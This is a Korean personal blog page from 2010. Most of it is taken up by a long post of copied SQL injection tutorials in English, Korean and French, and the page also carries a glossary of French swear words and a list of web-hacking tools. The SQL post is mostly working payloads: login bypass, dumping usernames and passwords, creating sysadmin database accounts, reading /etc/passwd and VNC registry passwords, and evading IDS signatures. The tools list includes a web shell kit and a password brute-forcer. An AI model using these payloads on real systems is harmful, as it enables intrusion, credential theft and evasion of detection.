'분류 전체보기'에 해당되는 글 152건

  1. 2010.09.27 프랑스 욕 콤보 by yangdaegam 1
  2. 2010.09.26 500일의 썸머 by yangdaegam
  3. 2010.09.20 내 여친은 페라리 by yangdaegam
  4. 2010.09.08 브라질리안 왁싱 by yangdaegam
  5. 2010.09.07 Canadian by yangdaegam
  6. 2010.09.06 [HQ] The Ten Tenors - Bohemian Rhapsody by yangdaegam
  7. 2010.08.29 90210 애니. by yangdaegam
  8. 2010.08.28 놀러와 외모대결 by yangdaegam
  9. 2010.08.22 제나 헤이즈 남자 둘과... by yangdaegam
  10. 2010.08.13 보안정보사이트 by yangdaegam 1
  11. 2010.08.13 WEB Application Security by yangdaegam
  12. 2010.08.13 SQL Injection by yangdaegam 1
  13. 2010.08.11 Knockin' On Heaven's Door (1997) by yangdaegam
  14. 2010.08.07 스타크래프트 2 by yangdaegam
  15. 2010.08.07 Vista by yangdaegam

프랑스 욕 콤보

stuffs 2010. 9. 27. 16:13
1. mince : 멍스 라고 발음합니다. "멍"에 강세를 두고 발음하며, 스 발음은 거의 묻어버려야 합니다. 대단히 신사적인 욕설로서, 뜻은 "제길"이지만 존재하는 모든 욕 가운데 그나마 가장 예의를 갖춰준 비속어이기 때문에 사실상 요즘은 "아차" 정도로 사용되는 경우가 많습니다. 공식석상에서 교장선생님이 잉크를 엎지르면 가끔 들을 수 있지요. 기품있는 마담이나 마드모아젤, 신사숙녀는 여기까지만 사용합니다.

 

2. putain : 퓌탱, 퓨탕, 퓌탕 쀠땅, 쀼땅 등 강세와 억양에 따라 멋대로 읽히는 이 단어는 한국말의 "쌍" 혹은 문화부장관님이 공인하신 "욕이 아닌 단어"에 부합합니다. 사전적인 뜻은 매춘부를 일컫는 단어이지만 엄청나게 광범위하게 사용되는데요, 생활 전반에 걸쳐 프랑스 욕설의 삼대 산맥을 이루고 있습니다. 줄임말로 pute, put 퓻, 퓟 등이 있으며 뜻은 동일합니다.

 

3. merde : 메르드, 메흐드, 메흐, 메흐(드)로 발음되는 이 단어는 puain에 버금가는 용법을 가지고 있으며 putain과 더불어 욕의 절대 산맥을 이루고 있는 명욕(?)입니다. 

 

종종 다른 욕설과 혼합되어 사용되기도 합니다. 예를 들어 putain merde라는 숙어처럼요. 대개의 경우 merde가 뒤에 붙으며 앞쪽에 접두사를 수반합니다. 사전적인 용어는 "개똥"을 가리키며, 광범위한 용법 만큼이나 단일한 표현도 가능하고 접두사와 함께 쓰일 수도 있는 만능형 욕설입니다. 욕설 넘버 쓰리 안에 꼽히는 프랑스 욕의 대표주자.

 

4. con, connard : 구제불능의 바보를 지칭하는 "꽁" "꼬나". 가장 유명한 프랑스의 욕설입니다. 사전을 찾아봐도 이 이상의 욕은 없습니다. 그러나 간혹 친구에게 이 단어를 들을 경우도 있는데, 그때는 긴장하지 말고 반드시 웃으면서 되갚아 주어야 합니다. 친구끼리 "십원짜리 욕"을 주고받으며 우정을 키워가는 문화는 그 나라도 가지고 있으니까요. 

 

대다수 프랑스 고등학생들은 방과 후 하교하며 이 단어를 주고받습니다. 어쩌다 들었다고 겁먹지 마세요. 너무 무거운 욕이라 진지하게 사용되는 경우는 거의 없으며, 실제로 진지하게 달고 사는 사람은 프랑스 정치인들 뿐입니다.

 

connerie: 바보같은 짓이라는, 꼬나에서 파생된 또다른 단어도 있습니다. 이 역시 광범위하게 일상적으로 사용됩니다. 한국에서 겨울마다 부르는 동요 "손이 꽁꽁꽁~ 발이 꽁꽁꽁~"을 불러주면 프랑스인들의 눈을 휘둥그레지게 만들어줄 수 있습니다. 

 

5. bordelle : 보델, 보흐델, 등으로 발음됩니다. "제기럴"이라는 뜻을 가지고 있는 단어이지만 zut 과는 달리 문장의 끝에 주로 붙습니다. 이게 붙어버리면 보통 앞의 문장은 죄다 제기랄이라는 뜻을 수식하는 어조가 되어버리기 쉽습니다. 

 

대개 문장의 끝에 붙게 되므로 다양한 접두사를 가져오게 되지만, 그냥 사용해도 좋습니다. 전술한 putain 과 merde와 함께 쓰이면 3연타 콤보로 사용 가능한 멋진 욕설이 됩니다. " putain bordelle de la merde "라고 사용하며, 이 경우 중간에 de la 라는 말을 집어넣어 주어야 올바른 용법입니다.

 

6. zut : 쥣(트), 쉿, 쥿, 슛(트) 등으로 발음됩니다. 한국어의 "제길" 혹은 "제기럴", 영어의 "shit"에 해당하는 이 욕설은 앞의 두 단어와 비교하면 비교적 덜 상스러운 표현으로 사용되며, 보통 다른 욕설과 혼합되지 않고 단일한  표현으로 사용되곤 합니다. 

 

단일 표현이기 때문에 문장의 앞에서 느낌표와 함께 사용되곤 하는데, 예를 들어 커피를 엎질렀을때 나지막하게 사용하면 좋습니다. 영화 레옹에서 죽어가는 레옹의 점퍼를 젖힌 악당 경찰 게리 올드만이 안전핀이 뽑힌 수류탄들을 발견하고는 뱉은 마지막 대사이기도 합니다.

 

7. chien : 개를 말합니다. 프랑스에서도 개는 욕입니다. 개보다는 차라리 돼지(cochon)가 낫다고 할 정도로 모욕적인 단어로 사용됩니다. 물론 이 단어는 그냥 사용하면 생물학적인 "개"를 의미하게 되므로, 욕설로 사용하려면 반드시 수식어를 붙여야 합니다. "nom de chien" "espece de chien, "c'est chien", "fils de chien" 등이 일반적입니다.

 

chiote 은 강아지를 일컫습니다. 뜻은 한국과 같습니다. 전술한 "개"와는 달리 단독으로 사용가능하며, 이 경우 생물학적인 "강아지"를 의미하지 않습니다. 보통 도박판에서 좋지 않은 패를 잡았을 때라거나 판돈을 잃었을 때 사용하는데, 그때 이 말을 하면 아무도 "강아지"라고 알아듣지 않습니다. 이 때는 에누리없이 "개자식"입니다. 단독 사용할 경우 la를 제거하고 그냥 발음합니다. "쉬옷(트)"

 

☞ 한국에서 할머니가 자신을 보고 귀엽다고 "강아지"라고 불렀다고 해서 그걸 곧이곧대로 그렇다고 말하면 다들 경악을 금치 못하게 됩니다. 프랑스에서 강아지는 귀여움의 대명사라기 보다는 욕설의 뉘앙스가 강하니까요.

 

8. se niquer : 동사처럼 활용됩니다. 뜻은 영어의 Fuc* 입니다. 본래 존재하지 않는 말이었는데, 사전적인 의미의 Fuc*와 동의어인 se baiser를 너무 직접적인 의미라는 이유에서 자신의 영화 대사로 차용하기 싫었던 어느 영화감독이 그것의 대체어로 사용했다 합니다. 그 이래 젊은 층에 대유행하기 시작했다고 하더군요.

 

사용법은 프랑스어의 일반적인 동사와 같으므로 영어의 단일한 표현처럼 홀로 사용되지 않습니다. 쥬 트 닉, 튀 마 니케...등 동사변화의 법칙을 전부 활용할 수 있으므로 반과거, 진행과거, 가정법 등 전부 사용이 가능하며, 독특한 동사형 욕설이므로 다양한 단일형 욕설을 앞이나 뒤에 붙일 수 있습니다. putain...bordelle...이 붙어도 무리가 없습니다. 보시면 아시겠지만 동사변화시 선행변화 시키는 것은 avior 동사가 아니라 etre 동사입니다.

 

9. fils de ~ : 한국어로 "~의 아들"을 나타냅니다. "fille de~", ~의 딸을 지칭하는 말은 욕설로 사용되지 않습니다. 남성 중심이었던 프랑스의 과거 역사를 보여주는 말이죠. 접두어로 공용되고 있으며, 보통 여기 "개"나 "매춘부"가 붙어 상대를 모욕하는데 쓰입니다. 

 

영화 '반지의 제왕'에서 흔히 찾아볼 수 있는 말인데, '곤도르의 아들 누구' 라는 식으로 사용됩니다. 이 말은 엄밀한 의미로는 욕설이 아니지만, 현실적으로는 욕설로 많이 차용되고 있습니다.

 

10. espece de ~ : "에스페스 드 ~ "라고 발음합니다. "~같은" 이라는 한국어에 해당한다. 괄호 안의 단어는 뭐든지 사용 가능합니다. 거기 보델bodelle이 들어가면 "제길같으니" 가 되고, 메르드merde 가 붙으면 "足같은"이 됩니다.  프랑스의 욕설 가운데 가장 광범위하게 쓰이는 접두사로서, 그 이유는 이 말이 인칭대명사로서 쓰일 수 있기 때문입니다. 

 

스펠링과 용법은 같지만 사람에게 대고 쓰면 바로 "뭣같은 사람"이라는 말이 됩니다. espece de vieux 같은 경우는 노인같은 녀석이라는 말이 되며, 이는 욕설은 아닙니다. 그러나 vieux 대신 chien이나 putain 이 들어간다면? 바로 주먹이 날아오기 쉽습니다. 간혹 해당 장르의 "일종"이라는 뜻으로도 쓰일 수 있습니다. (= sort de~)

 

11. negro : 어떤 경우에서든 프랑스에서는 절대 해서는 안되는 욕입니다. 흑인을 지칭하는 학술용어라고 착각마세요.

 

프랑스어의 네그로는 nez - gros(넓은 코)의 의미를 가지게 되는 지독한 욕입니다. 영원히 상종못할 인간쓰레기,인종차별주의자 취급을 받고 싶지 않다면 이 말은 영구 봉인해야 합니다. 

 

현지인들이 흑인을 지칭할 때는 영어를 사용합니다. black.

 

12. stupid : 스튜피. 바보를 지칭합니다. 그러나 적어도 교육에 의해 구제받을 가능성은 있다는 점에서 전술한 con 보다는 훨씬 낫습니다. 한국어의 '바보'라는 단어가 가지는 미약한 애교의 뉘앙스는 이 단어가 가지고 있지요. 그러나 애인이 아닌, 처음보는 녀석에게 이 말을 듣게 되면 교육에 의해 구제받기를 기다리기 보다는 먼저 이 말을 내뱉은 상대의 눈두덩을 한 방 갈겨주어야만 더 이상 바보 소리를 듣지 않게 됩니다.

 

지역과 지방에 따라 다르겠지만 se stupiditer(바보하다), la stupidition(바보지수) 등 사전에 존재하지 않는 단어들을 조합하여 용도에 맞게 다양하게 활용할 수도 있습니다. 친구와 뒷담화놀이 하다보면 이런 말장난도 은근히 재미들립니다.

 

13. la salope, salopa : 살롭, 살로파라는 단어로 사용됩니다. 의미는 "헤픈 여자"거나 "창녀" 입니다. 이 말은 지금도 진지하게 불특정 여인의 행실을 깎아내리거나 지칭할 때 사용되곤 합니다. 몸가짐이 헤픈 여자는 거의 예외없이 남자들의 이 단어를 사용한 뒷담화를 받습니다.

 

salope, salopa 는 둘 다 접두사를 붙여 사용할 수 있지만 그나마 salopa는 개별적인 사용이 가능한 단어이고, salope은 접두사를 수반할 수 있는 용법을 가지고 있습니다. fils de salope, espece de salope, nom de salope...

 

단어 자체는 여성형이지만 접두사와 함께 사용될 경우 la 가 자연스럽게 탈락합니다. putain, merde와 함께 무적의 트로이카 체제를 구축하는 욕설로서, 순수 명사형으로 salaud 가 있긴 하지만 열받은 프랑스인들은 구별없이 마구 사용하곤 합니다.

 

14. fou : "미친" 이라는 뜻을 가지고 있습니다. "푸"라고 발음하며, 진지한 의미의 정신이상을 가리키기도 하지만 대개 "돌았다" 라는 뜻으로 사용됩니다. completement fou(완전히 돌아버린), moitie fou(절반쯤 돌아버린), fornchiment fou" (분명히 돌아버린), casiement fou 혹은 presque fou (거의 돌아버린) 정도로 사용되고 있습니다.

 

15: nom de ~ 욕은 아니지만 욕에 사용되는 접두어. ~의 이름으로 란 뜻이 아니라 "~같은" 이라는 뜻을 나타낸다. 신기한 것은 여기에 Dieu, "신"이 사용되는 경우가 종종 있다는 것입니다. 물론 이 경우 신에 대한 경의를 표하기 위해서 그 뒤에 붙는 말을 생략하고 단순한 감탄, 혹은 비명으로 사용합니다. 

 

"Nom de Dieu!!Arkkk!! " " 신이시여!!아악!! " 

 

물론 욕설에서는 "신" 대신 "개"가 붙기도 합니다. 이 경우 활용은 급속하게 상스러워 지게 됩니다.

 

16. n'importe quoi : 넘 뽁트 꾸아 라고 발음. "아무거나" 라는 사전적 의미이지만, 논쟁 중에 이 말을 하게 되면 그것은 상대가 입에서 나오는 대로 아무 소리나 마구 지껄이는 중이라는 의미입니다. 상대의 논리를 공격하거나 부정할 때 사용하며, 모욕적인 억양을 주고 싶을 경우는 느리게 발음하는 것이 좋습니다. 너어아암~포오어어아악뜨-꾸아아아아아~.

 

17. bleu, petit : 블루, 쁘띠라고 읽습니다. 파란색, 초보, 작은, 막내를 일컫는 단어로 전혀 욕같지가 않지만, 이게 불쾌한 표정과 섞이면 바로 욕이 되곤 합니다. 군대에서 입대한 지 얼마 안되어 어리버리한 졸병을 일컬을 때도 사용합니다. 물론 이 때는 이 말을 들어도 절대 개기면 안되겠죠. petit는 작다는 뜻도 있지만 하찮다는 뜻도 가지고 있습니다. 예컨대 petite pute는 키가 작은 매춘부를 가리키는 말이 아니라 하찮은 매춘부를 지칭하는 말입니다.

 

프랑스에서는 초보를 새파랗다고 표현하는데, 재미있게도 프랑스 국가대표 축구팀은 "초보들"-les bleu 이라는 속뜻을 가지고 있는 것 같습니다.

 

18. sale : 쌀. 직역하자면 "더러운" 입니다. 사전적인 의미도 그렇듯, 이 말은 욕설에 걸맞는 활용빈도를 가지고 있습니다. con도 그냥 말하면 친근의 표시인지 욕인지 알 수가 없는데, 앞에 이게 붙으면 바로 욕이 됩니다. 

흔히 인종차별주의자(racist)들이 주로 사용하는 단어로, 이 말을 듣는 한국 유학생이라면 이 단어가 주변 환경을 의미하는 것이 아닌 이상 분노하는 것이 대개 옳습니다. 일반적으로 con이나 pute 와 함께 붙어 사용됩니다. 더러운 바보, 혹은 매춘부라는 뜻의 지독한 욕으로서, 후속되는 욕설의 효과를 강력하게 증폭시킵니다.

 

19. Recule! Reculez! 허큘! 허큘레! 라고 발음하는데, 존댓말을 쓴다고 생각하지 마세요. 이것은 존댓말로 사용하는 용법이 아니라 다수를 상대로 하는 용법이기 쉽습니다. "물러서"라는 뜻이지만 보통 "비켜" 내지는 "꺼져"의 강력한 명령형입니다. 보행도로로 차를 몰아가는 헐리우드 영화의 카액션 신에서 주인공이 무고한 행인들에게 하는 말이기도 합니다.

 

20. Ta geule : 마지막 20번째 순위에 마크된 이 말은 따결, 타결 등으로 발음합니다. "따" 발음을 최대한 빨리 해치우는 것이 포인트. 뜻은 "닥쳐" 입니다. 비교적 온순한 동의어로 "La freme- 닫아" "Freme ta bouche- 입닫아"가 있지만, 그건 이 말의 상스러움에 비하면 국어책에서나 볼 수 있을 듯한 순화된 말 들입니다.(아무리 순화되었더라도 마음에 드는 여학생 앞에서 하면 100% 딱지맞습니다.) 이 따결이 다른 욕설과 맞붙으면 바로 논쟁이 주먹다짐으로 점화되기 쉽습니다. 진정으로 상대가 닥쳐주길 바란다면 뒤에 "s'il te plait"(제발 부탁이야)를 붙일 수도 있습니다. 뜻은 완화되지 않습니다. 

 

복수형은 vos geules. 복수형으로 사용한 친구는 딱 한명을 보았었는데, 클래스의 델레게(delegue : 반장)녀석이었습니다. 그는 우리 '유쾌한' 친구들에게 바로 처절하게 응징당했습니다. 욕설의 복수를 대상으로 한 사용은 불특정 다수에 의한 광범위한 다구리를 불러오게 되니 주의하시기 바랍니다.

 

★ 주먹다짐 10단 콤보 : Ta geule connard!! espece de salopa putain boedelle de la merde, c'est n'importe quoi espece de chiote, t'es fou ou quoi? 
Posted by yangdaegam
l

Posted by yangdaegam
l

내 여친은 페라리

stuffs 2010. 9. 20. 10:33

Posted by yangdaegam
l


아;; 아프겠;;;

해볼까;;

Posted by yangdaegam
l

Canadian

stuffs/Information 2010. 9. 7. 14:17

사촌동생 양희수
제수씨와 조카 예담
그 동네 놀러간 부랑자 양희종

양희종 이놈 나랑 같은 과였어 ㅋ.ㅋ
Posted by yangdaegam
l


Posted by yangdaegam
l

90210 애니.

stuffs/Information 2010. 8. 29. 10:40
사실 드라마 자체는 아류도 아니고;; 에피도 아니고;;
프랜차이즈라는 새로운 드라마 재구성?의 형태라는데;;

머 그래서 신경도 안쓰다가. OCN에서 보고 생각난거 하나.

누구랑 닮았다-_-;;;

그래서 올려본다..




응 닮았지?

드라마가 궁금하면 클릭
http://raha.egloos.com/1807810
Posted by yangdaegam
l

놀러와 외모대결

stuffs 2010. 8. 28. 13:20


Posted by yangdaegam
l

다른 AV와의 차이점.
1. 남자가 뮤지컬배우다.
2. 자막이 있다.
3. AV가 아니다.;;
Posted by yangdaegam
l
Posted by yangdaegam
l

open-labs.png

httptraceroute02.tar.gz HTTPTRACEROUTE: HTTP based traceroute PoC.

sqlibf113b2.tar.gz SQLIBF: Tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application.

crazy_encoder3.tar.gz CRAZY_ENCODER: Miscellaneous HTTP encodings calculator. (Win32 + MFC gui)

gzip_encoding01.tar.gz GZIP_ENCODING: Command line tools for simple manipulation of Gzip Encoded HTTP transfers.

iisbruteforcer15.tar.gz IISBF: HTTP authentication cracker. It's a tool that launchs an online dictionary attack to test for weak or simple passwords against protected areas on an IIS Web server.

metoscan05.tar.gz METOSCAN: Simple tool for scanning the HTTP methods supported by a Web server. It works by testing a URL and checking the responses for the different requests.

easy_scraper02.tar.gz EASY_SCRAPER: Simple, easy and dirty perl based Web Data Scraper. It works by querying a Website multiple times and copying returned content to generate a custom database. (Perl + 1337 Tk gui)

hacker_webkit02.tar.gz HACKER_WEBKIT: Pack of scripts useful for doing pentesting in a wide range of Web servers. Each module includes 3 components: Command execution, Directory browsing and File uploading. Current modules are: ASP, CFM, EXE, JSP, PHP, PL, SERVLET and SH.

ecoscan04.tar.gz ECOSCAN: Simple tool for scanning the HTTP encodings supported by a Web server. It works testing a URL and checking the responses for the different probes.

dirb204.tar.gz DIRB: Tool for doing Web Scanning by looking for hidden Web Objects. It works by launching a dictionary attack against a Web server and analizing the responses. DIRB main purpose is to help in Web application security auditing.

ob-session04.tar.gz OB-SESSION: HTTP session cookie analyzer script. It does some tests over the session identifiers and calculate the linear correlation between the different IDs. This gives an approximation to the strength of the cookie against cookie prediction attacks.

Posted by yangdaegam
l

SQL Injection

WORK/SECURITY 2010. 8. 13. 15:18

  
Sql Injection Paper                       
            
     By zeroday.         
        zeroday [ at ] blacksecurity.org 

1.Introduction.
2.Testing for vulnerabilities.
3.Gathering Information.
4.Data types.
5.Grabbing Passwords.
6.Create DB accounts.
7.MySQL OS Interaction.
8.Server name and config.
9.Retrieving VNC password from registry.
10.IDS Signature Evasion.
11.mySQL Input Validation Circumvention using Char().
12.IDS Signature Evasion using comments.
13.Strings without quotes.

1. When a box only has port 80 open, it's almost certain the admin will patch his server,
The best thing to turn to is web attacks. Sql Injection is one of the most common web attacks.
You attack the web application, ( ASP, JSP, PHP, CGI..etc) rather than the webserver
or the services running on the OS.
Sql injection is a way to trick using a qurey or command as a input via webpages,
most websites take parameters from the user like username and passwrod or even their emails.
They all use Sql querys.

2. First of you should start with something simple.
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are simple ways to try another ones are:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--

3.Gathering Infomation.
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will Find the actual Version of the computer, OS/service pack.

4.Data types.

Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

5.Grabbing passwords

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.Create DB accounts.

MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access
CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'

Oracle
CRATE USER name IDENTIFIED BY pass123
        TEMPORARY TABLESPACE temp
         DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

7.MySQL OS Interaction

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8.Server name and config.

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

9.Retrieving VNC password from registry.

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

10.IDS Signature Evasion.
Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.

# milw0rm.com [2006-03-28]



--SQL Injection Attack

--drop table users
create table users ( id int,
    username varchar(255),
    password varchar(25),
    privs int );

insert into users values (0, 'admin', '1234', 0xffff)
insert into users values (0, 'guest', 'guest', 0x0000)
insert into users values (0, 'chris', 'password', 0x00ff)
insert into users values (0, 'fred', 'sesame', 0x00ff)

 

--1 : 테이블명 알아내기(having)
select * from users where username='' having 1=1-- and password = ''

 

--2 : 필드명 알아내기(group by)
select * from users where username='' group by users.id having 1=1-- and password=''
select * from users where username='' group by users.id, users.username having 1=1-- and password=''
select * from users where username='' group by users.id, users.username, users.password having 1=1-- and password=''
select * from users where username='' group by users.id, users.username, users.password, users.privs having 1=1-- and password=''

 

--3 : 필드타입 알아내기(union)
select * from users where username='' union select sum(username) from users-- and password=''
select * from users where username='' union select sum(password) from users-- and password=''
select * from users where username='' union select sum(privs) from users-- and password=''


--4 : 계정만들기(insert)
select * from users where username=''; insert into users values(666,'attacker','foobar',0xffff)-- and password=''


--5 : 버전 및 환경 알아내기(@@version)
select * from users where username='' union select @@version, 1, 1, 1-- and password=''
select * from users where username='' union select 1, @@version, 1, 1-- and password=''

 

--6 : 계정 추출하기(type convert error)
select * from users where username='' union select min(username),1,1,1 from users where username > 'a'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'admin'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'attacker'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'chris'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'fred'-- and password=''
select * from users where username='' union select min(username),1,1,1 from users where username > 'guest'-- and password=''

 

--7 : 계정의 패스워드 알아내기
select * from users where username='' union select password,1,1,1 from users where username='admin'-- and password=''

 

--8 : Transact-SQL
select * from users where username=''; begin declare @ret varchar(8000)
                                       set @ret=':'
                                       select @ret=@ret+' '+username+'/'+password from users where
                                       username > @ret
                                       select @ret as ret into foo
                                       end-- password=''
select * from users where username='' union select ret,1,1,1 from foo-- password=''

 

 

-- Blind Sql Injection

 

일반적인 Sql Injection 공격을 막기 위해서는 사용자가 입력한 질의에 대해 불필요한 에러페이지를
노출시키지 않는 것이 좋다.

그러나 이러한 방법 또한 최선의 선택은 아니라고 할 수 있는데, 이러한 해결방법은 바로 Bline Sql
Injection 공격을 통해 우회가 가능하다.

Blind Sql Injection이란 마치 장님이 손으로 더듬듯이, 알아내고자 하는 정보의 답변을 미리 대략적
으로 예측해서 그것이 참인지 거짓인지를 질의하고, 서버의 반응으로 참/거짓 여부를 판단하면서 참이
될때 까지 시도 함으로서 정보를 알아내는 방법이다.

이 방법을 통하여 데이터베이스의 테이블 이름, 컬럼 이름 등의 정보를 알아내는 것이 가능하다.

 

Detecting to Blind Sql Injection

 

공격을 하기 전에, 해당 페이지에 취약점이 존재하는지 확인하는 작업이 필요하다.

* 서버측 쿼리문
strSQL="select user_id, name, user_pw from member where user_id='"&id&"' and user_pw='"&password&"'

* 정상 질의
http://victim.co.kr/member/member_login_check.asp?user_id=hacker&user_pw=1234

* 취약점 테스팅 질의
http://victim.co.kr/member/member_login_check.asp?user_id=hacker&user_pw=1234' and 1=1--

 

만약 위 질의의 결과가 같다면 Blind Sql Injection에 취약하다고 볼 수 있다. 이제 Blind Sql Injection에
취약한 어플리케이션에 and 1=1 대신 참/거짓을 구별할 수 있는 쿼리문을 삽입하면 되며, 이때 데이터베이스가
이전과 같은 결과값을 출력하는지(참), 아니면 값을 출력하지 않는지(거짓)를 통해 자신의 입력한 내용이
참인지 거짓인지를 쉽게 판별할 수 있다.

 

이와같은 방법으로 참/거짓의 여부에 따라 예측내용을 조금씩 바꾸어서 질의하는 과정을 반복함으로써
최종적으로는 정확한 값을 알아낼 수 있게 되는 것이다. 그러나, Blind Sql Injection의 경우
수작업으로하기에는 무리가 따르며, 주로 자동화된 툴을 사용하여 공격을 하게 된다


[FRENCH] Full SQL injection Tutorial Par Moudi - EvilWay Team ( MySQL )

*** Sommaire ***

__________
Chapitre I)
__________

0) Description : SQL INJECTION.
1) Comment reconnaitre qu'un site est vulnérable a un SQL ?
2) Trouver le nombre de colomns.
3) Utiliser la fonction UNION.
4) Trouver la version du MySQL.
5) Trouver les noms des colomns et tables et l'exploitation.

__________
Chapitre II)
__________

1) Description : Blind SQL INJECTION.
2) Comment reconnaitre qu'un site est vulnérable au BLIND SQL ?
3) Trouver la version du MySQL.
4) Tester si la sélection marche.
5) Trouver les noms des colomns et tables et l'exploitation.


-----------------------------
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-----------------------------

>> Passons aux choses sérieuses maintenant...

__________
Chapitre I)
__________

0) Description : SQL INJECTION.

Le SQL INJECTION est l'une des communes les plus vulnérables dans les applications type " web " de nos jours.
Il permet d'exécuter la requête dans la base de données et d'avoir grace a l'url a certains renseignements confidentiels et bien d'autres...

=============> 

1) Comment reconnaitre qu'un site est vulnérable a un SQL ?

Commencons ce tuto en force !
Prénons un exemple d'un site par exemple:

http://www.site-exemple.com/news.php?id=9
Maintenant, il faudra tester si ce site est vulnérable par SQL, c'est simple , nous ajoutons un ' ( quote ) et donc l'exemple deviendra :
http://www.site-exemple.com/news.php?id=9' <= quote ajouter !

Maintenant, si vous appercevez une erreur du genre:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

Ou une erreur de cet exemple, cela signifie que ce site est vulnérable par SQL. ^^

=============> 

2) Trouver le nombre de columns.

Pour trouver le nombre de columns , on utilisera " ORDER BY " qui demande a la base un résultat.

Donc maintenant, comment on utilise cela? Eh bien simplement augmenter le nombre jusqu'à ce que nous obtenons une erreur comme dans l'exemple ci-dessous:

http://www.site-exemple.com/news.php?id=9 order by 1/* <-- no error

http://www.site-exemple.com/news.php?id=9 order by 2/* <-- no error

http://www.site-exemple.com/news.php?id=9 order by 3/* <-- no error

http://www.site-exemple.com/news.php?id=9 order by 4/* <-- error (une erreur du genre: Unknown column '4' in 'order clause' ou un truc de ce genre s'affichera)
	
Cela signifie que l'on dispose de 3 colonnes, car nous avons reçu une cause d'erreur sur 4.

=============> 

3) Utiliser la fonction UNION.

Passons aux choses un peux plus dure..
Avec la fonction UNION, nous avons la possibilité de sélectionner plusieurs données en un seul SQL a la fois.
Donc nous aurons:
http://www.site-exemple.com/news.php?id=9 union all select 1,2,3/* (nous avons deja trouver que le nombre de column est bien 3 , revoir la section (Chapitre I , cours : 2). )

si nous voyons quelques chiffres sur l'écran, c'est-à-dire 1 ou 2 ou 3 alors l'union a fonctionné.
Si cela ne fonctionne pas , essayer de changer le /* par -- 

=============> 

4) Trouver la version du MySQL.
Disons que nous avons le numero 2 , maintenant il faudra connaitre la version MySQL , pour cela nous allons remplacer le numero 2 par @@version ou version() et nous aurons quelques choses du genre: 4.1.33-log or 5.0.45 ou du meme type...

alors l'exemple sera:
http://www.site-exemple.com/news.php?id=9 union all select 1,@@version,3/*
Bingo , la version du MySQL est devant vos yeux :)

=============> 

5) Trouver les noms des columns et tables et l'exploitation.

Maintenant si la version est < 5 ( 4.1.33, 4.1.12...) , vous devez savoir que les noms de table commun pour cette version sont: user/s , admin/s , member/s .........
pour les columns c'est: username , user, usr, user_name, password, pass, passwd, pwd ....

Passons a son exploitation:

Cherchons la table d'admin:

http://www.site-exemple.com/news.php?id=9 union all select 1,2,3 from admin/*
Si vous appercevez le numero 2 , alors cela signifie que vous venez de trouver la table d'admin et qu'il existe...

Cherchons les noms des columns:

http://www.site-exemple.com/news.php?id=9 union all select 1,username,3 from admin/* (si vous avez une erreur ici , alors essayer un autre nom de column)
Si nous avons le nom d'utilisateur qui s'affiche à l'écran, par exemple, être admin ou superadmin etc alors c'est bon...

Maintenant pour la column de mot de passe,

http://www.site-exemple.com/news.php?id=9 union all select 1,password,3 from admin/* (si vous avez une erreur ici , alors essayer un autre nom de column)
Si nous avons le password a l'écran du type hash ou sans, alors c'est bon, le type varie en fonction de la base de donnée

